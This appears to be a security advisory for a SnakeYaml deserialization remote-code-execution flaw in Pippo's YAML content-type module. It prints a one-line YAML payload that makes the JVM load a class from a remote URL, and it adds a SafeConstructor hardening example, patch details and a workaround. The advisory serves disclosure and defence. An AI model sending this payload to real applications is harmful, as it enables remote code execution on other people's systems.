This vulnerability exists because SnakeYaml enables the loading of arbitrary object graphs. For example, the following payload will allow an attacker to cause the JVM to class-load an external JAR file and instantiate an attacker-controlled instance of javax.script.ScriptEngineFactory via the Java service loader.
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://localhost:8080/"]]]]
Impact
Remote Code Execution vulnerability when the SnakeYamlEngine ContentTypeEngine is installed in an application. This is because the SnakeYaml deserializer by default allows arbitrary deserialization of Java objects (CVE-2022-1471).
Vulnerability
The following code paths are vulnerable to this:
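Whatever the affected code paths, the root cause is the loader configuration used to turn a request body into objects. As an added example that is not part of Pippo or this advisory, the snippet below shows the hardened way to hand an untrusted body to SnakeYaml, assuming SnakeYaml 1.33 or 2.x on the classpath and a hypothetical parseUntrusted helper: SafeConstructor restricts documents to core YAML types, so a global tag like the one in the payload above is rejected with ConstructorException instead of resolving a JVM class.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.ConstructorException;
import org.yaml.snakeyaml.constructor.SafeConstructor;

import java.util.Map;

// Added example (not Pippo's code): parse YAML received over HTTP without
// letting global "!!" tags instantiate arbitrary classes.
public class SafeYamlContentType {

    // SafeConstructor only knows the core YAML types (maps, sequences,
    // scalars). The vulnerable pattern is "new Yaml()" on SnakeYaml 1.x,
    // whose default Constructor resolves "!!some.Class" tags to Java classes.
    // SafeConstructor(LoaderOptions) exists in both 1.33 and 2.x.
    private static final Yaml SAFE_YAML =
            new Yaml(new SafeConstructor(new LoaderOptions()));

    // Hypothetical helper: what a ContentTypeEngine.fromString path should do.
    public static Map<String, Object> parseUntrusted(String body) {
        return SAFE_YAML.load(body);
    }

    public static void main(String[] args) {
        // Constructed sample: an ordinary request body parses normally.
        System.out.println(parseUntrusted("name: alice\nroles: [user, admin]\n"));

        // Constructed sample: a document carrying a global tag is refused
        // before any class is looked up.
        try {
            parseUntrusted("!!java.net.URL [\"http://example.invalid/\"]\n");
        } catch (ConstructorException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```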
Patches
Resolved in this commit, which updates SnakeYaml to 2.0:
Workarounds
Remove the ro.pippo:pippo-snakeyaml module from your application.
References